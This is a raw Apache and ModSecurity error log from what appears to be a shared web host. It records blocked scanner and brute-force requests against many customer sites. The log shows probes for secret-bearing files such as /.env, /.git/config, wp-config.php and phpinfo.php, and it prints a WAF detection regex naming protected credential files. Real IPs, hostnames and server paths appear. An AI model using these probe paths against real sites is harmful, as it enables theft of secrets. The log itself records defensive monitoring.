[Tue May 26 13:03:06.462159 2026] [security2:error] [pid 470766:tid 470962] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMsujO_W1DqEcFHQ7zpgAAAEI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 13:03:07.892517 2026] [security2:error] [pid 470766:tid 470923] [client 4.201.75.230:6096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/login.php"] [unique_id "ahVMs-jO_W1DqEcFHQ7z0AAAABs"]
[Tue May 26 13:03:08.289991 2026] [security2:error] [pid 470766:tid 470960] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMs-jO_W1DqEcFHQ7zzwAAAEA"]
[Tue May 26 13:03:08.374993 2026] [security2:error] [pid 470766:tid 471008] [client 104.43.242.179:44943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/ppp.php"] [unique_id "ahVMtOjO_W1DqEcFHQ7z5QAAAHA"]
[Tue May 26 13:03:08.375139 2026] [security2:error] [pid 470766:tid 471008] [client 104.43.242.179:44943] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/ppp.php"] [unique_id "ahVMtOjO_W1DqEcFHQ7z5QAAAHA"]
[Tue May 26 13:03:08.416470 2026] [security2:error] [pid 470766:tid 470802] [remote 74.7.241.58:48198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVMtOjO_W1DqEcFHQ7z5gAAGiM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/includes
[Tue May 26 13:03:08.547723 2026] [security2:error] [pid 470766:tid 470953] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMtOjO_W1DqEcFHQ7z2QAAADk"]
[Tue May 26 13:03:08.551121 2026] [security2:error] [pid 470766:tid 470909] [client 210.1.247.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMtOjO_W1DqEcFHQ7z6QAAAA0"], referer: https://anujtradingco.com
[Tue May 26 13:03:10.510446 2026] [security2:error] [pid 470766:tid 470917] [client 4.201.75.230:6022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/main.php"] [unique_id "ahVMtujO_W1DqEcFHQ70LwAAABU"]
[Tue May 26 13:03:10.771221 2026] [security2:error] [pid 470766:tid 471012] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMtujO_W1DqEcFHQ70KAAAAHQ"]
[Tue May 26 13:03:11.471516 2026] [security2:error] [pid 470766:tid 470948] [client 4.201.75.230:6051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/settings.php"] [unique_id "ahVMt-jO_W1DqEcFHQ70SwAAADQ"]
[Tue May 26 13:03:11.783698 2026] [security2:error] [pid 470766:tid 471021] [client 157.20.138.61:61684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMt-jO_W1DqEcFHQ70VQAAAH0"]
[Tue May 26 13:03:11.783823 2026] [security2:error] [pid 470766:tid 471021] [client 157.20.138.61:61684] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMt-jO_W1DqEcFHQ70VQAAAH0"]
[Tue May 26 13:03:12.238280 2026] [security2:error] [pid 470766:tid 470924] [client 216.73.217.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVMtujO_W1DqEcFHQ70OwAAHCo"]
[Tue May 26 13:03:12.666423 2026] [security2:error] [pid 470766:tid 470963] [client 4.201.75.230:6040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-activate.php"] [unique_id "ahVMuOjO_W1DqEcFHQ70eAAAAEM"]
[Tue May 26 13:03:13.026874 2026] [security2:error] [pid 470766:tid 470981] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMuOjO_W1DqEcFHQ70dAAAAFU"]
[Tue May 26 13:03:15.384666 2026] [security2:error] [pid 470766:tid 470915] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMuujO_W1DqEcFHQ70swAAABM"]
[Tue May 26 13:03:16.772118 2026] [security2:error] [pid 470766:tid 470836] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/phpinfo.php"] [unique_id "ahVMvOjO_W1DqEcFHQ705QAAPkU"], referer: http://kingsclub.in/phpinfo.php
[Tue May 26 13:03:16.772437 2026] [security2:error] [pid 470766:tid 470826] [remote 91.92.42.86:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kingsclub.in"] [uri "/.env"] [unique_id "ahVMvOjO_W1DqEcFHQ707AAAIjs"], referer: http://kingsclub.in/.env
[Tue May 26 13:03:16.775527 2026] [security2:error] [pid 470766:tid 470844] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/info.php"] [unique_id "ahVMvOjO_W1DqEcFHQ705gAAbE0"], referer: http://kingsclub.in/info.php
[Tue May 26 13:03:16.809573 2026] [security2:error] [pid 470766:tid 470812] [remote 51.68.87.127:24314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.87.68.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVMvOjO_W1DqEcFHQ704QAAXS0"]
[Tue May 26 13:03:16.867084 2026] [security2:error] [pid 470766:tid 470845] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/config.php"] [unique_id "ahVMvOjO_W1DqEcFHQ708AAAEU4"], referer: http://kingsclub.in/config.php
[Tue May 26 13:03:17.444323 2026] [security2:error] [pid 470766:tid 470902] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMvOjO_W1DqEcFHQ709QAAAAY"]
[Tue May 26 13:03:17.758722 2026] [security2:error] [pid 470766:tid 471015] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVMvOjO_W1DqEcFHQ707gAAdzk"], referer: http://kingsclub.in/.git/config
[Tue May 26 13:03:17.850255 2026] [security2:error] [pid 470766:tid 470807] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVMvOjO_W1DqEcFHQ708QAAMyg"], referer: http://kingsclub.in/server.js
[Tue May 26 13:03:17.929369 2026] [security2:error] [pid 470766:tid 470779] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVMvOjO_W1DqEcFHQ708gAAdww"], referer: http://kingsclub.in/appsettings.json
[Tue May 26 13:03:18.650146 2026] [security2:error] [pid 470766:tid 470925] [client 43.173.179.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVMvejO_W1DqEcFHQ71GwAAAB0"]
[Tue May 26 13:03:19.461656 2026] [security2:error] [pid 470766:tid 470962] [client 74.7.230.59:56896] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.siliconelevators.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVMv-jO_W1DqEcFHQ71PgAAAEI"]
[Tue May 26 13:03:19.970795 2026] [security2:error] [pid 470766:tid 470984] [client 5.104.72.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMv-jO_W1DqEcFHQ71UQAAAFg"], referer: http://www.anujtradingco.com/
[Tue May 26 13:03:20.213091 2026] [security2:error] [pid 470766:tid 470967] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMv-jO_W1DqEcFHQ71TQAAAEc"]
[Tue May 26 13:03:20.496893 2026] [security2:error] [pid 470766:tid 470951] [client 5.104.72.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMwOjO_W1DqEcFHQ71WQAAADc"], referer: http://www.anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 13:03:22.266272 2026] [security2:error] [pid 470766:tid 471009] [client 157.20.138.61:62044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMwujO_W1DqEcFHQ71mQAAAHE"]
[Tue May 26 13:03:22.266415 2026] [security2:error] [pid 470766:tid 471009] [client 157.20.138.61:62044] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMwujO_W1DqEcFHQ71mQAAAHE"]
[Tue May 26 13:03:22.680558 2026] [security2:error] [pid 470766:tid 470979] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMwujO_W1DqEcFHQ71kgAAAFM"]
[Tue May 26 13:03:22.778719 2026] [security2:error] [pid 470766:tid 470986] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVMvOjO_W1DqEcFHQ707wAAQjA"], referer: http://kingsclub.in/app.js
[Tue May 26 13:03:23.586261 2026] [security2:error] [pid 470766:tid 471013] [client 4.201.75.230:5525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-blog-header.php"] [unique_id "ahVMw-jO_W1DqEcFHQ71ugAAAHU"]
[Tue May 26 13:03:24.990199 2026] [security2:error] [pid 470766:tid 470913] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMxOjO_W1DqEcFHQ712QAAABE"]
[Tue May 26 13:03:27.001595 2026] [security2:error] [pid 470766:tid 470908] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMxujO_W1DqEcFHQ72EgAAAAw"]
[Tue May 26 13:03:27.002565 2026] [security2:error] [pid 470766:tid 471011] [client 4.201.75.230:5248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMx-jO_W1DqEcFHQ72HAAAAHM"]
[Tue May 26 13:03:27.947144 2026] [core:crit] [pid 470766:tid 471018] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:03:28.060239 2026] [security2:error] [pid 470766:tid 470945] [client 159.26.103.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMx-jO_W1DqEcFHQ72NQAAADE"]
[Tue May 26 13:03:28.212475 2026] [core:crit] [pid 470766:tid 470974] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:03:28.819351 2026] [security2:error] [pid 470766:tid 470913] [client 4.201.75.230:5512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-conffq.php"] [unique_id "ahVMyOjO_W1DqEcFHQ72WwAAABE"]
[Tue May 26 13:03:29.381180 2026] [security2:error] [pid 470766:tid 470896] [client 176.65.139.232:47260] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVMyejO_W1DqEcFHQ72bwAAAAA"]
[Tue May 26 13:03:29.564671 2026] [security2:error] [pid 470766:tid 470931] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMyejO_W1DqEcFHQ72XwAAACM"]
[Tue May 26 13:03:29.849969 2026] [security2:error] [pid 470766:tid 470940] [client 4.201.75.230:5520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-config-sample.php"] [unique_id "ahVMyejO_W1DqEcFHQ72fAAAACw"]
[Tue May 26 13:03:30.582162 2026] [security2:error] [pid 470766:tid 470922] [client 74.7.230.33:39138] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVMyujO_W1DqEcFHQ72lAAAGhc"]
[Tue May 26 13:03:31.828342 2026] [security2:error] [pid 470766:tid 471002] [client 74.7.241.174:44560] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVMy-jO_W1DqEcFHQ72uwAAaiA"]
[Tue May 26 13:03:32.142418 2026] [security2:error] [pid 470766:tid 470993] [client 4.201.75.230:5533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-config.php"] [unique_id "ahVMzOjO_W1DqEcFHQ72yAAAAGE"]
[Tue May 26 13:03:32.350287 2026] [security2:error] [pid 470766:tid 470929] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMy-jO_W1DqEcFHQ72wAAAACE"]
[Tue May 26 13:03:32.496904 2026] [proxy:error] [pid 470766:tid 470907] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:03:32.496950 2026] [proxy_http:error] [pid 470766:tid 470907] [client 46.151.182.172:60925] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:03:32.497516 2026] [proxy:error] [pid 470766:tid 470907] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:03:32.497548 2026] [proxy_http:error] [pid 470766:tid 470907] [client 46.151.182.172:60925] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:03:32.497620 2026] [security2:error] [pid 470766:tid 470907] [client 46.151.182.172:60925] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVMzOjO_W1DqEcFHQ726QAAAAs"]
[Tue May 26 13:03:32.499289 2026] [autoindex:error] [pid 470766:tid 471023] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/newnigeria.media/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.499899 2026] [security2:error] [pid 470766:tid 471023] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "newnigeria.thedebateafrica.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ724wAAAH8"]
[Tue May 26 13:03:32.500445 2026] [security2:error] [pid 470766:tid 470951] [client 46.151.182.172:60910] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "newnigeria.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ722AAAADc"]
[Tue May 26 13:03:32.504062 2026] [security2:error] [pid 470766:tid 470954] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "strapptech.com"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ724gAAADo"]
[Tue May 26 13:03:32.504323 2026] [security2:error] [pid 470766:tid 470952] [client 46.151.182.172:60915] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "strapptech.com"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ722wAAADg"]
[Tue May 26 13:03:32.505319 2026] [autoindex:error] [pid 470766:tid 470913] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/workrepublic.debatenigeria.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.505962 2026] [security2:error] [pid 470766:tid 470913] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "workrepublic.thedebateafrica.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ725gAAABE"]
[Tue May 26 13:03:32.508969 2026] [core:alert] [pid 470766:tid 470997] [client 46.151.182.172:0] /home2/debatqhn/enattafoodparcel.org/.htaccess: </IfModule> without matching <IfModule> section
[Tue May 26 13:03:32.509074 2026] [autoindex:error] [pid 470766:tid 470982] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/public_html/buyrepublic.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.509080 2026] [security2:error] [pid 470766:tid 470953] [client 46.151.182.172:60916] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "workrepublic.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ723QAAADk"]
[Tue May 26 13:03:32.509454 2026] [security2:error] [pid 470766:tid 470997] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "enattafoodparcel.org.thedebateafrica.org"] [uri "/cgi-sys/500.html"] [unique_id "ahVMzOjO_W1DqEcFHQ728gAAAGU"]
[Tue May 26 13:03:32.509802 2026] [security2:error] [pid 470766:tid 470982] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "buyrepublic.thedebateafrica.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ726gAAAFY"]
